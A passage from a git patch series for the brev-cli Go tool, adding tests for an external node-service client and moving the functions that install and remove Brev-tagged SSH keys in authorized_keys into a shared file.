http.NewRequestWithContext(context.Background(), http.MethodGet, "http://localhost", nil) + resp, err := client.Do(req) + if err == nil { + resp.Body.Close() //nolint:errcheck // test + t.Fatal("expected error from token provider") + } +} + +func Test_toProtoNodeSpec(t *testing.T) { + cpuCount := int32(12) + ramBytes := int64(137438953472) + memBytes := int64(137438953472) + + local := &NodeSpec{ + GPUs: []NodeGPU{ + {Model: "NVIDIA GB10", Count: 2, MemoryBytes: &memBytes}, + }, + RAMBytes: &ramBytes, + CPUCount: &cpuCount, + Architecture: "arm64", + Storage: []NodeStorage{ + {StorageBytes: 500107862016, StorageType: "SSD"}, + }, + OS: "Ubuntu", + OSVersion: "24.04", + } + + proto := toProtoNodeSpec(local) + + if proto.GetCpuCount() != 12 { + t.Errorf("expected CpuCount 12, got %d", proto.GetCpuCount()) + } + if proto.GetRamBytes() != 137438953472 { + t.Errorf("expected RamBytes, got %d", proto.GetRamBytes()) + } + if proto.GetArchitecture() != "arm64" { + t.Errorf("expected arm64, got %s", proto.GetArchitecture()) + } + if proto.GetOs() != "Ubuntu" { + t.Errorf("expected Ubuntu, got %s", proto.GetOs()) + } + if proto.GetOsVersion() != "24.04" { + t.Errorf("expected 24.04, got %s", proto.GetOsVersion()) + } + if len(proto.GetStorage()) != 1 { + t.Fatalf("expected 1 storage entry, got %d", len(proto.GetStorage())) + } + if proto.GetStorage()[0].GetStorageBytes() != 500107862016 { + t.Errorf("expected StorageBytes 500107862016, got %d", proto.GetStorage()[0].GetStorageBytes()) + } + if proto.GetStorage()[0].GetStorageType() != "SSD" { + t.Errorf("expected SSD, got %s", proto.GetStorage()[0].GetStorageType()) + } + if len(proto.GetGpus()) != 1 { + t.Fatalf("expected 1 GPU, got %d", len(proto.GetGpus())) + } + gpu := proto.GetGpus()[0] + if gpu.GetModel() != "NVIDIA GB10" { + t.Errorf("expected NVIDIA GB10, got %s", gpu.GetModel()) + } + if gpu.GetCount() != 2 { + t.Errorf("expected count 2, got %d", gpu.GetCount()) + } + if gpu.GetMemoryBytes() != 137438953472 { + t.Errorf("expected memory bytes, got %d", gpu.GetMemoryBytes()) + } +} + +func Test_toProtoNodeSpec_Nil(t *testing.T) { + if toProtoNodeSpec(nil) != nil { + t.Error("expected nil for nil input") + } +} + +func Test_toProtoNodeSpec_MinimalFields(t *testing.T) { + local := &NodeSpec{ + Architecture: "amd64", + } + proto := toProtoNodeSpec(local) + if proto.GetArchitecture() != "amd64" { + t.Errorf("expected amd64, got %s", proto.GetArchitecture()) + } + if proto.RamBytes != nil { + t.Error("expected nil RamBytes") + } + if proto.CpuCount != nil { + t.Error("expected nil CpuCount") + } + if len(proto.GetGpus()) != 0 { + t.Error("expected no GPUs") + } +} + +// fakeNodeService implements the server side of ExternalNodeService for testing. +type fakeNodeService struct { + nodev1connect.UnimplementedExternalNodeServiceHandler + addNodeFn func(*nodev1.AddNodeRequest) (*nodev1.AddNodeResponse, error) + removeNodeFn func(*nodev1.RemoveNodeRequest) (*nodev1.RemoveNodeResponse, error) +} + +func (f *fakeNodeService) AddNode(_ context.Context, req *connect.Request[nodev1.AddNodeRequest]) (*connect.Response[nodev1.AddNodeResponse], error) { + resp, err := f.addNodeFn(req.Msg) + if err != nil { + return nil, err + } + return connect.NewResponse(resp), nil +} + +func (f *fakeNodeService) RemoveNode(_ context.Context, req *connect.Request[nodev1.RemoveNodeRequest]) (*connect.Response[nodev1.RemoveNodeResponse], error) { + resp, err := f.removeNodeFn(req.Msg) + if err != nil { + return nil, err + } + return connect.NewResponse(resp), nil +} + +func Test_NewNodeServiceClient_AddNode(t *testing.T) { + svc := &fakeNodeService{ + addNodeFn: func(req *nodev1.AddNodeRequest) (*nodev1.AddNodeResponse, error) { + if req.GetOrganizationId() != "org_123" { + t.Errorf("unexpected org ID: %s", req.GetOrganizationId()) + } + if req.GetName() != "My Spark" { + t.Errorf("unexpected name: %s", req.GetName()) + } + return &nodev1.AddNodeResponse{ + ExternalNode: &nodev1.ExternalNode{ + ExternalNodeId: "unode_abc", + OrganizationId: "org_123", + Name: req.GetName(), + DeviceId: req.GetDeviceId(), + }, + }, nil + }, + } + + _, handler := nodev1connect.NewExternalNodeServiceHandler(svc) + server := httptest.NewServer(handler) + defer server.Close() + + client := NewNodeServiceClient(&mockTokenProvider{token: "tok"}, server.URL) + + resp, err := client.AddNode(context.Background(), connect.NewRequest(&nodev1.AddNodeRequest{ + OrganizationId: "org_123", + Name: "My Spark", + DeviceId: "dev-uuid", + NodeSpec: &nodev1.NodeSpec{Architecture: strPtr("arm64")}, + })) + if err != nil { + t.Fatalf("AddNode failed: %v", err) + } + if resp.Msg.GetExternalNode().GetExternalNodeId() != "unode_abc" { + t.Errorf("unexpected node ID: %s", resp.Msg.GetExternalNode().GetExternalNodeId()) + } +} + +func Test_NewNodeServiceClient_AddNode_ServerError(t *testing.T) { + svc := &fakeNodeService{ + addNodeFn: func(_ *nodev1.AddNodeRequest) (*nodev1.AddNodeResponse, error) { + return nil, connect.NewError(connect.CodeInternal, nil) + }, + } + + _, handler := nodev1connect.NewExternalNodeServiceHandler(svc) + server := httptest.NewServer(handler) + defer server.Close() + + client := NewNodeServiceClient(&mockTokenProvider{token: "tok"}, server.URL) + + _, err := client.AddNode(context.Background(), connect.NewRequest(&nodev1.AddNodeRequest{ + OrganizationId: "org_123", + Name: "Test", + DeviceId: "dev", + })) + if err == nil { + t.Fatal("expected error for server error response") + } +} + +func Test_NewNodeServiceClient_RemoveNode(t *testing.T) { + svc := &fakeNodeService{ + removeNodeFn: func(req *nodev1.RemoveNodeRequest) (*nodev1.RemoveNodeResponse, error) { + if req.GetExternalNodeId() != "unode_abc" { + t.Errorf("unexpected node ID: %s", req.GetExternalNodeId()) + } + return &nodev1.RemoveNodeResponse{}, nil + }, + } + + _, handler := nodev1connect.NewExternalNodeServiceHandler(svc) + server := httptest.NewServer(handler) + defer server.Close() + + client := NewNodeServiceClient(&mockTokenProvider{token: "tok"}, server.URL) + + _, err := client.RemoveNode(context.Background(), connect.NewRequest(&nodev1.RemoveNodeRequest{ + ExternalNodeId: "unode_abc", + })) + if err != nil { + t.Fatalf("RemoveNode failed: %v", err) + } +} + +func Test_NewNodeServiceClient_RemoveNode_ServerError(t *testing.T) { + svc := &fakeNodeService{ + removeNodeFn: func(_ *nodev1.RemoveNodeRequest) (*nodev1.RemoveNodeResponse, error) { + return nil, connect.NewError(connect.CodeNotFound, nil) + }, + } + + _, handler := nodev1connect.NewExternalNodeServiceHandler(svc) + server := httptest.NewServer(handler) + defer server.Close() + + client := NewNodeServiceClient(&mockTokenProvider{token: "tok"}, server.URL) + + _, err := client.RemoveNode(context.Background(), connect.NewRequest(&nodev1.RemoveNodeRequest{ + ExternalNodeId: "unode_missing", + })) + if err == nil { + t.Fatal("expected error for not found response") + } +} + +func strPtr(s string) *string { return &s } diff --git a/pkg/entity/entity.go b/pkg/entity/entity.go index 57ca29aba..868f1fee9 100644 --- a/pkg/entity/entity.go +++ b/pkg/entity/entity.go @@ -570,6 +570,17 @@ func (u User) GetOnboardingData() (*OnboardingData, error) { return x, nil } +type OrgRoleAttachment struct { + Subject string `json:"subject"` + Object string `json:"object"` + Role OrgRoleAttachmentRole `json:"role"` +} + +type OrgRoleAttachmentRole struct { + ID string `json:"id"` + Actions []string `json:"actions"` +} + type ModifyWorkspaceRequest struct { WorkspaceClass string `json:"workspaceClassId"` IsStoppable *bool `json:"isStoppable"` diff --git a/pkg/store/http.go b/pkg/store/http.go index c64d92171..60884f810 100644 --- a/pkg/store/http.go +++ b/pkg/store/http.go @@ -61,6 +61,15 @@ func (s *AuthHTTPStore) GetWindowsDir() (string, error) { return s.GetWSLHostHomeDir() } +// GetAccessToken returns a fresh access token, refreshing if needed. +func (s *AuthHTTPStore) GetAccessToken() (string, error) { + token, err := s.authHTTPClient.auth.GetAccessToken() + if err != nil { + return "", breverrors.WrapAndTrace(err) + } + return token, nil +} + func (f *FileStore) WithAuthHTTPClient(c *AuthHTTPClient) *AuthHTTPStore { // err never returned from GetCurrentWorkspaceID id, _ := f.GetCurrentWorkspaceID() diff --git a/pkg/store/organization.go b/pkg/store/organization.go index d7f4b472c..3414ba6b6 100644 --- a/pkg/store/organization.go +++ b/pkg/store/organization.go @@ -214,6 +214,22 @@ func GetDefaultOrNilOrg(orgs []entity.Organization) *entity.Organization { } } +func (s AuthHTTPStore) GetOrgRoleAttachments(orgID string) ([]entity.OrgRoleAttachment, error) { + var result []entity.OrgRoleAttachment + res, err := s.authHTTPClient.restyClient.R(). + SetHeader("Content-Type", "application/json"). + SetResult(&result). + Get(fmt.Sprintf("api/organizations/%s/role_attachments", orgID)) + if err != nil { + return nil, breverrors.WrapAndTrace(err) + } + if res.IsError() { + return nil, NewHTTPResponseError(res) + } + + return result, nil +} + type RedeemCouponCodeRequest struct { Code string `json:"Code"` } diff --git a/pkg/store/user.go b/pkg/store/user.go index 9926ffada..fe44be9fa 100644 --- a/pkg/store/user.go +++ b/pkg/store/user.go @@ -129,6 +129,22 @@ var usersIDPathPattern = fmt.Sprintf("%s/%s", usersPath, "%s") // usersIDPath = fmt.Sprintf(usersIDPathPattern, fmt.Sprintf("{%s}", userIDParamStr)) +func (s AuthHTTPStore) GetUserByID(userID string) (*entity.User, error) { + var result entity.User + res, err := s.authHTTPClient.restyClient.R(). + SetHeader("Content-Type", "application/json"). + SetResult(&result). + Get(fmt.Sprintf(usersIDPathPattern, userID)) + if err != nil { + return nil, breverrors.WrapAndTrace(err) + } + if res.IsError() { + return nil, NewHTTPResponseError(res) + } + + return &result, nil +} + func (s AuthHTTPStore) GetUsers(queryParams map[string]string) ([]entity.User, error) { var result []entity.User res, err := s.authHTTPClient.restyClient.R(). From 677f49e4e9c28d8b4f4e6bb033fb9698cfe6fc31 Mon Sep 17 00:00:00 2001 From: Pratik Patel Date: Mon, 2 Mar 2026 16:39:00 -0800 Subject: [PATCH 2/4] claude review feedback --- pkg/cmd/deregister/deregister.go | 5 +- pkg/cmd/deregister/deregister_test.go | 8 +-- pkg/cmd/enablessh/enablessh.go | 78 +------------------------ pkg/cmd/enablessh/enablessh_test.go | 46 ++++++++------- pkg/cmd/grantssh/grantssh.go | 8 ++- pkg/cmd/ls/ls.go | 13 ++++- pkg/cmd/register/register.go | 51 ++--------------- pkg/cmd/register/sshkeys.go | 82 +++++++++++++++++++++++++++ 8 files changed, 131 insertions(+), 160 deletions(-) create mode 100644 pkg/cmd/register/sshkeys.go diff --git a/pkg/cmd/deregister/deregister.go b/pkg/cmd/deregister/deregister.go index eea35e002..2d3546f6a 100644 --- a/pkg/cmd/deregister/deregister.go +++ b/pkg/cmd/deregister/deregister.go @@ -10,7 +10,6 @@ import ( nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" "connectrpc.com/connect" - "github.com/brevdev/brev-cli/pkg/cmd/enablessh" "github.com/brevdev/brev-cli/pkg/cmd/register" "github.com/brevdev/brev-cli/pkg/config" "github.com/brevdev/brev-cli/pkg/entity" @@ -52,11 +51,11 @@ type SSHKeyRemover interface { RemoveBrevKeys(u *user.User) error } -// brevSSHKeyRemover delegates to enablessh.RemoveBrevAuthorizedKeys. +// brevSSHKeyRemover delegates to register.RemoveBrevAuthorizedKeys. type brevSSHKeyRemover struct{} func (brevSSHKeyRemover) RemoveBrevKeys(u *user.User) error { - if err := enablessh.RemoveBrevAuthorizedKeys(u); err != nil { + if err := register.RemoveBrevAuthorizedKeys(u); err != nil { return fmt.Errorf("removing brev authorized keys: %w", err) } return nil diff --git a/pkg/cmd/deregister/deregister_test.go b/pkg/cmd/deregister/deregister_test.go index 5e7ccec59..5a0dc1fed 100644 --- a/pkg/cmd/deregister/deregister_test.go +++ b/pkg/cmd/deregister/deregister_test.go @@ -205,14 +205,8 @@ func Test_runDeregister_UserCancels(t *testing.T) { deps, server := testDeregisterDeps(t, svc, regStore) defer server.Close() - callCount := 0 deps.prompter = mockSelector{fn: func(_ string, _ []string) string { - callCount++ - if callCount == 2 { - // Second prompt is the confirmation — cancel it - return "No, cancel" - } - return "No, keep NetBird installed" + return "No, cancel" }} term := terminal.New() diff --git a/pkg/cmd/enablessh/enablessh.go b/pkg/cmd/enablessh/enablessh.go index 3651a9a3e..ce7efb8e8 100644 --- a/pkg/cmd/enablessh/enablessh.go +++ b/pkg/cmd/enablessh/enablessh.go @@ -5,11 +5,8 @@ package enablessh import ( "context" "fmt" - "os" "os/exec" "os/user" - "path/filepath" - "strings" nodev1connect "buf.build/gen/go/brevdev/devplane/connectrpc/go/devplaneapi/v1/devplaneapiv1connect" nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" @@ -130,7 +127,7 @@ func EnableSSH( t.Vprint("") if brevUser.PublicKey != "" { - if err := InstallAuthorizedKey(u, brevUser.PublicKey); err != nil { + if err := register.InstallAuthorizedKey(u, brevUser.PublicKey); err != nil { t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: failed to install SSH public key: %v", err))) } else { t.Vprint(" Brev public key added to authorized_keys.") @@ -150,79 +147,6 @@ func EnableSSH( return nil } -// BrevKeyComment is the marker appended to every SSH key that Brev installs. -// It allows RemoveBrevAuthorizedKeys to identify and remove exactly those keys. -const BrevKeyComment = "# brev-cli" - -// InstallAuthorizedKey appends the given public key to the user's -// ~/.ssh/authorized_keys if it isn't already present. The key is tagged with -// a brev-cli comment so it can be removed later by RemoveBrevAuthorizedKeys. -func InstallAuthorizedKey(u *user.User, pubKey string) error { - pubKey = strings.TrimSpace(pubKey) - if pubKey == "" { - return nil - } - - sshDir := filepath.Join(u.HomeDir, ".ssh") - if err := os.MkdirAll(sshDir, 0o700); err != nil { - return fmt.Errorf("creating .ssh directory: %w", err) - } - - authKeysPath := filepath.Join(sshDir, "authorized_keys") - - existing, err := os.ReadFile(authKeysPath) // #nosec G304 - if err != nil && !os.IsNotExist(err) { - return fmt.Errorf("reading authorized_keys: %w", err) - } - - if strings.Contains(string(existing), pubKey) { - return nil // already present (tagged or not) - } - - taggedKey := pubKey + " " + BrevKeyComment - - // Ensure existing content ends with a newline before appending. - content := string(existing) - if len(content) > 0 && !strings.HasSuffix(content, "\n") { - content += "\n" - } - content += taggedKey + "\n" - - if err := os.WriteFile(authKeysPath, []byte(content), 0o600); err != nil { - return fmt.Errorf("writing authorized_keys: %w", err) - } - - return nil -} - -// RemoveBrevAuthorizedKeys removes all SSH keys tagged with the brev-cli -// comment from the user's ~/.ssh/authorized_keys. -func RemoveBrevAuthorizedKeys(u *user.User) error { - authKeysPath := filepath.Join(u.HomeDir, ".ssh", "authorized_keys") - - existing, err := os.ReadFile(authKeysPath) // #nosec G304 - if err != nil { - if os.IsNotExist(err) { - return nil - } - return fmt.Errorf("reading authorized_keys: %w", err) - } - - var kept []string - for _, line := range strings.Split(string(existing), "\n") { - if strings.Contains(line, BrevKeyComment) { - continue - } - kept = append(kept, line) - } - - result := strings.Join(kept, "\n") - if err := os.WriteFile(authKeysPath, []byte(result), 0o600); err != nil { - return fmt.Errorf("writing authorized_keys: %w", err) - } - return nil -} - // checkSSHDaemon prints a warning if neither "ssh" nor "sshd" systemd services // appear to be active. It never returns an error — it is best-effort. func checkSSHDaemon(t *terminal.Terminal) { diff --git a/pkg/cmd/enablessh/enablessh_test.go b/pkg/cmd/enablessh/enablessh_test.go index d4edb138a..1048c8adf 100644 --- a/pkg/cmd/enablessh/enablessh_test.go +++ b/pkg/cmd/enablessh/enablessh_test.go @@ -6,6 +6,8 @@ import ( "path/filepath" "strings" "testing" + + "github.com/brevdev/brev-cli/pkg/cmd/register" ) // tempUser returns a *user.User whose HomeDir points to a temporary directory. @@ -29,23 +31,23 @@ func readAuthorizedKeys(t *testing.T, u *user.User) string { func Test_InstallAuthorizedKey_TagsKeyWithBrevComment(t *testing.T) { u := tempUser(t) - if err := InstallAuthorizedKey(u, "ssh-rsa AAAA testkey"); err != nil { + if err := register.InstallAuthorizedKey(u, "ssh-rsa AAAA testkey"); err != nil { t.Fatalf("InstallAuthorizedKey: %v", err) } content := readAuthorizedKeys(t, u) - if !strings.Contains(content, "ssh-rsa AAAA testkey "+BrevKeyComment) { - t.Errorf("expected key tagged with %q, got:\n%s", BrevKeyComment, content) + if !strings.Contains(content, "ssh-rsa AAAA testkey "+register.BrevKeyComment) { + t.Errorf("expected key tagged with %q, got:\n%s", register.BrevKeyComment, content) } } func Test_InstallAuthorizedKey_SkipsDuplicate(t *testing.T) { u := tempUser(t) - if err := InstallAuthorizedKey(u, "ssh-rsa AAAA testkey"); err != nil { + if err := register.InstallAuthorizedKey(u, "ssh-rsa AAAA testkey"); err != nil { t.Fatalf("first install: %v", err) } - if err := InstallAuthorizedKey(u, "ssh-rsa AAAA testkey"); err != nil { + if err := register.InstallAuthorizedKey(u, "ssh-rsa AAAA testkey"); err != nil { t.Fatalf("second install: %v", err) } @@ -64,11 +66,11 @@ func Test_InstallAuthorizedKey_SkipsDuplicateEvenIfAlreadyTagged(t *testing.T) { if err := os.MkdirAll(sshDir, 0o700); err != nil { t.Fatal(err) } - if err := os.WriteFile(filepath.Join(sshDir, "authorized_keys"), []byte("ssh-rsa AAAA testkey "+BrevKeyComment+"\n"), 0o600); err != nil { + if err := os.WriteFile(filepath.Join(sshDir, "authorized_keys"), []byte("ssh-rsa AAAA testkey "+register.BrevKeyComment+"\n"), 0o600); err != nil { t.Fatal(err) } - if err := InstallAuthorizedKey(u, "ssh-rsa AAAA testkey"); err != nil { + if err := register.InstallAuthorizedKey(u, "ssh-rsa AAAA testkey"); err != nil { t.Fatalf("InstallAuthorizedKey: %v", err) } @@ -82,10 +84,10 @@ func Test_InstallAuthorizedKey_SkipsDuplicateEvenIfAlreadyTagged(t *testing.T) { func Test_InstallAuthorizedKey_EmptyKeyIsNoop(t *testing.T) { u := tempUser(t) - if err := InstallAuthorizedKey(u, ""); err != nil { + if err := register.InstallAuthorizedKey(u, ""); err != nil { t.Fatalf("InstallAuthorizedKey: %v", err) } - if err := InstallAuthorizedKey(u, " "); err != nil { + if err := register.InstallAuthorizedKey(u, " "); err != nil { t.Fatalf("InstallAuthorizedKey (whitespace): %v", err) } @@ -99,7 +101,7 @@ func Test_InstallAuthorizedKey_EmptyKeyIsNoop(t *testing.T) { func Test_InstallAuthorizedKey_CreatesSSHDir(t *testing.T) { u := tempUser(t) - if err := InstallAuthorizedKey(u, "ssh-rsa AAAA testkey"); err != nil { + if err := register.InstallAuthorizedKey(u, "ssh-rsa AAAA testkey"); err != nil { t.Fatalf("InstallAuthorizedKey: %v", err) } @@ -124,7 +126,7 @@ func Test_InstallAuthorizedKey_PreservesExistingKeys(t *testing.T) { t.Fatal(err) } - if err := InstallAuthorizedKey(u, "ssh-rsa AAAA testkey"); err != nil { + if err := register.InstallAuthorizedKey(u, "ssh-rsa AAAA testkey"); err != nil { t.Fatalf("InstallAuthorizedKey: %v", err) } @@ -132,7 +134,7 @@ func Test_InstallAuthorizedKey_PreservesExistingKeys(t *testing.T) { if !strings.Contains(content, "ssh-rsa EXISTING user@host") { t.Errorf("existing key was lost:\n%s", content) } - if !strings.Contains(content, "ssh-rsa AAAA testkey "+BrevKeyComment) { + if !strings.Contains(content, "ssh-rsa AAAA testkey "+register.BrevKeyComment) { t.Errorf("new key not found:\n%s", content) } } @@ -148,21 +150,21 @@ func Test_RemoveBrevAuthorizedKeys_RemovesTaggedKeys(t *testing.T) { content := strings.Join([]string{ "ssh-rsa EXISTING user@host", - "ssh-rsa BREVKEY1 " + BrevKeyComment, + "ssh-rsa BREVKEY1 " + register.BrevKeyComment, "ssh-ed25519 OTHERKEY admin@server", - "ssh-rsa BREVKEY2 " + BrevKeyComment, + "ssh-rsa BREVKEY2 " + register.BrevKeyComment, "", }, "\n") if err := os.WriteFile(filepath.Join(sshDir, "authorized_keys"), []byte(content), 0o600); err != nil { t.Fatal(err) } - if err := RemoveBrevAuthorizedKeys(u); err != nil { + if err := register.RemoveBrevAuthorizedKeys(u); err != nil { t.Fatalf("RemoveBrevAuthorizedKeys: %v", err) } result := readAuthorizedKeys(t, u) - if strings.Contains(result, BrevKeyComment) { + if strings.Contains(result, register.BrevKeyComment) { t.Errorf("brev keys still present:\n%s", result) } if !strings.Contains(result, "ssh-rsa EXISTING user@host") { @@ -176,7 +178,7 @@ func Test_RemoveBrevAuthorizedKeys_RemovesTaggedKeys(t *testing.T) { func Test_RemoveBrevAuthorizedKeys_NoopWhenFileDoesNotExist(t *testing.T) { u := tempUser(t) - if err := RemoveBrevAuthorizedKeys(u); err != nil { + if err := register.RemoveBrevAuthorizedKeys(u); err != nil { t.Fatalf("expected no error for missing file, got: %v", err) } } @@ -193,7 +195,7 @@ func Test_RemoveBrevAuthorizedKeys_NoopWhenNoBrevKeys(t *testing.T) { t.Fatal(err) } - if err := RemoveBrevAuthorizedKeys(u); err != nil { + if err := register.RemoveBrevAuthorizedKeys(u); err != nil { t.Fatalf("RemoveBrevAuthorizedKeys: %v", err) } @@ -218,20 +220,20 @@ func Test_InstallThenRemove_RoundTrip(t *testing.T) { } // Install two brev keys. - if err := InstallAuthorizedKey(u, "ssh-rsa KEY1"); err != nil { + if err := register.InstallAuthorizedKey(u, "ssh-rsa KEY1"); err != nil { t.Fatal(err) } - if err := InstallAuthorizedKey(u, "ssh-rsa KEY2"); err != nil { + if err := register.InstallAuthorizedKey(u, "ssh-rsa KEY2"); err != nil { t.Fatal(err) } // Remove all brev keys. - if err := RemoveBrevAuthorizedKeys(u); err != nil { + if err := register.RemoveBrevAuthorizedKeys(u); err != nil { t.Fatal(err) } result := readAuthorizedKeys(t, u) - if strings.Contains(result, BrevKeyComment) { + if strings.Contains(result, register.BrevKeyComment) { t.Errorf("brev keys still present after removal:\n%s", result) } if !strings.Contains(result, "ssh-rsa EXISTING user@host") { diff --git a/pkg/cmd/grantssh/grantssh.go b/pkg/cmd/grantssh/grantssh.go index 7dc581874..d2ba7789e 100644 --- a/pkg/cmd/grantssh/grantssh.go +++ b/pkg/cmd/grantssh/grantssh.go @@ -14,7 +14,6 @@ import ( nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" "connectrpc.com/connect" - "github.com/brevdev/brev-cli/pkg/cmd/enablessh" "github.com/brevdev/brev-cli/pkg/cmd/register" "github.com/brevdev/brev-cli/pkg/config" "github.com/brevdev/brev-cli/pkg/entity" @@ -140,13 +139,16 @@ func runGrantSSH(ctx context.Context, t *terminal.Terminal, s GrantSSHStore, dep selected := deps.prompter.Select("Select a user to grant SSH access:", items) // Find the selected user. - var selectedIdx int + selectedIdx := -1 for i, item := range items { if item == selected { selectedIdx = i break } } + if selectedIdx < 0 { + return fmt.Errorf("selected item %q did not match any org member", selected) + } selectedUser := orgMembers[selectedIdx].user t.Vprint("") @@ -158,7 +160,7 @@ func runGrantSSH(ctx context.Context, t *terminal.Terminal, s GrantSSHStore, dep t.Vprint("") if selectedUser.PublicKey != "" { - if err := enablessh.InstallAuthorizedKey(u, selectedUser.PublicKey); err != nil { + if err := register.InstallAuthorizedKey(u, selectedUser.PublicKey); err != nil { t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: failed to install SSH public key: %v", err))) } else { t.Vprint(" Brev public key added to authorized_keys.") diff --git a/pkg/cmd/ls/ls.go b/pkg/cmd/ls/ls.go index 47c4e743c..1424603c4 100644 --- a/pkg/cmd/ls/ls.go +++ b/pkg/cmd/ls/ls.go @@ -761,8 +761,17 @@ func displayNodesTablePlain(nodes []*nodev1.ExternalNode) { } func nodeConnectionStatus(n *nodev1.ExternalNode) string { - if ci := n.GetConnectivityInfo(); ci != nil && ci.GetRegistrationCommand() != "" { + ci := n.GetConnectivityInfo() + if ci == nil { + return "UNKNOWN" + } + + switch ci.GetStatus() { + case nodev1.NetworkMemberStatus_NETWORK_MEMBER_STATUS_CONNECTED: + return "CONNECTED" + case nodev1.NetworkMemberStatus_NETWORK_MEMBER_STATUS_DISCONNECTED: + return "DISCONNECTED" + default: return "REGISTERED" } - return "UNKNOWN" } diff --git a/pkg/cmd/register/register.go b/pkg/cmd/register/register.go index b000386da..3e1e58f4e 100644 --- a/pkg/cmd/register/register.go +++ b/pkg/cmd/register/register.go @@ -6,8 +6,6 @@ import ( "fmt" "os" "os/user" - "path/filepath" - "strings" "time" nodev1connect "buf.build/gen/go/brevdev/devplane/connectrpc/go/devplaneapi/v1/devplaneapiv1connect" @@ -133,7 +131,10 @@ func runRegister(ctx context.Context, t *terminal.Terminal, s RegisterStore, nam return breverrors.WrapAndTrace(err) } - u, _ := user.Current() + u, err := user.Current() + if err != nil { + return fmt.Errorf("failed to determine current Linux user: %w", err) + } linuxUser := u.Username t.Vprint("") @@ -238,7 +239,7 @@ func grantSSHAccess(ctx context.Context, t *terminal.Terminal, deps registerDeps } if brevUser.PublicKey != "" { - if err := installAuthorizedKey(u, brevUser.PublicKey); err != nil { + if err := InstallAuthorizedKey(u, brevUser.PublicKey); err != nil { t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: failed to install SSH public key: %v", err))) } else { t.Vprint(" Brev public key added to authorized_keys.") @@ -248,48 +249,6 @@ func grantSSHAccess(ctx context.Context, t *terminal.Terminal, deps registerDeps t.Vprint(t.Green(fmt.Sprintf("SSH access enabled. You can now SSH to this device via: brev shell %s", reg.DisplayName))) } -const brevKeyComment = "# brev-cli" - -// installAuthorizedKey appends the given public key to the user's -// ~/.ssh/authorized_keys if it isn't already present. The key is tagged with -// a brev-cli comment so it can be identified and removed during deregistration. -func installAuthorizedKey(u *user.User, pubKey string) error { - pubKey = strings.TrimSpace(pubKey) - if pubKey == "" { - return nil - } - - sshDir := filepath.Join(u.HomeDir, ".ssh") - if err := os.MkdirAll(sshDir, 0o700); err != nil { - return fmt.Errorf("creating .ssh directory: %w", err) - } - - authKeysPath := filepath.Join(sshDir, "authorized_keys") - - existing, err := os.ReadFile(authKeysPath) // #nosec G304 - if err != nil && !os.IsNotExist(err) { - return fmt.Errorf("reading authorized_keys: %w", err) - } - - if strings.Contains(string(existing), pubKey) { - return nil // already present (tagged or not) - } - - taggedKey := pubKey + " " + brevKeyComment - - content := string(existing) - if len(content) > 0 && !strings.HasSuffix(content, "\n") { - content += "\n" - } - content += taggedKey + "\n" - - if err := os.WriteFile(authKeysPath, []byte(content), 0o600); err != nil { - return fmt.Errorf("writing authorized_keys: %w", err) - } - - return nil -} - func getOrgToRegisterFor(deps registerDeps, s RegisterStore) (*entity.Organization, error) { if !deps.platform.IsCompatible() { return nil, fmt.Errorf("brev register is only supported on Linux") diff --git a/pkg/cmd/register/sshkeys.go b/pkg/cmd/register/sshkeys.go new file mode 100644 index 000000000..a12f7e3e8 --- /dev/null +++ b/pkg/cmd/register/sshkeys.go @@ -0,0 +1,82 @@ +package register + +import ( + "fmt" + "os" + "os/user" + "path/filepath" + "strings" +) + +// BrevKeyComment is the marker appended to every SSH key that Brev installs. +// It allows RemoveBrevAuthorizedKeys to identify and remove exactly those keys. +const BrevKeyComment = "# brev-cli" + +// InstallAuthorizedKey appends the given public key to the user's +// ~/.ssh/authorized_keys if it isn't already present. The key is tagged with +// a brev-cli comment so it can be removed later by RemoveBrevAuthorizedKeys. +func InstallAuthorizedKey(u *user.User, pubKey string) error { + pubKey = strings.TrimSpace(pubKey) + if pubKey == "" { + return nil + } + + sshDir := filepath.Join(u.HomeDir, ".ssh") + if err := os.MkdirAll(sshDir, 0o700); err != nil { + return fmt.Errorf("creating .ssh directory: %w", err) + } + + authKeysPath := filepath.Join(sshDir, "authorized_keys") + + existing, err := os.ReadFile(authKeysPath) // #nosec G304 + if err != nil && !os.IsNotExist(err) { + return fmt.Errorf("reading authorized_keys: %w", err) + } + + if strings.Contains(string(existing), pubKey) { + return nil // already present (tagged or not) + } + + taggedKey := pubKey + " " + BrevKeyComment + + // Ensure existing content ends with a newline before appending. + content := string(existing) + if len(content) > 0 && !strings.HasSuffix(content, "\n") { + content += "\n" + } + content += taggedKey + "\n" + + if err := os.WriteFile(authKeysPath, []byte(content), 0o600); err != nil { + return fmt.Errorf("writing authorized_keys: %w", err) + } + + return nil +} + +// RemoveBrevAuthorizedKeys removes all SSH keys tagged with the brev-cli +// comment from the user's ~/.ssh/authorized_keys. +func RemoveBrevAuthorizedKeys(u *user.User) error { + authKeysPath := filepath.Join(u.HomeDir, ".ssh", "authorized_keys") + + existing, err := os.ReadFile(authKeysPath) // #nosec G304 + if err != nil { + if os.IsNotExist(err) { + return nil + } + return fmt.Errorf("reading authorized_keys: %w", err) + } + + var kept []string + for _, line := range strings.Split(string(existing), "\n") { + if strings.Contains(line, BrevKeyComment) { + continue + } + kept = append(kept, line) + } + + result := strings.Join(kept, "\n") + if err := os.WriteFile(authKeysPath, []byte(result), 0o600); err != nil { + return fmt.Errorf("writing authorized_keys: %w", err) + } + return nil +} From 622a89861894f584b4c61a4fb877485676e476c2 Mon Sep 17 00:00:00 2001 From: Pratik Patel Date: Tue, 3 Mar 2026 13:49:33 -0800 Subject: [PATCH 3/4] review feedback and more: some small interface changes, added an in memory auth store, added reconnect logic, renamed registration, tests --- pkg/auth/auth.go | 5 + pkg/cmd/cmd.go | 34 ++- pkg/cmd/deregister/deregister.go | 78 +++---- pkg/cmd/deregister/deregister_test.go | 148 ++++++------- pkg/cmd/enablessh/enablessh.go | 25 +-- pkg/cmd/enablessh/enablessh_test.go | 183 +++++++++++++++- pkg/cmd/grantssh/grantssh.go | 154 +++++++------ pkg/cmd/grantssh/grantssh_test.go | 3 +- pkg/cmd/ls/ls.go | 14 +- ..._store.go => device_registration_store.go} | 0 ...t.go => device_registration_store_test.go} | 0 pkg/cmd/register/hardware_test.go | 76 ++++--- 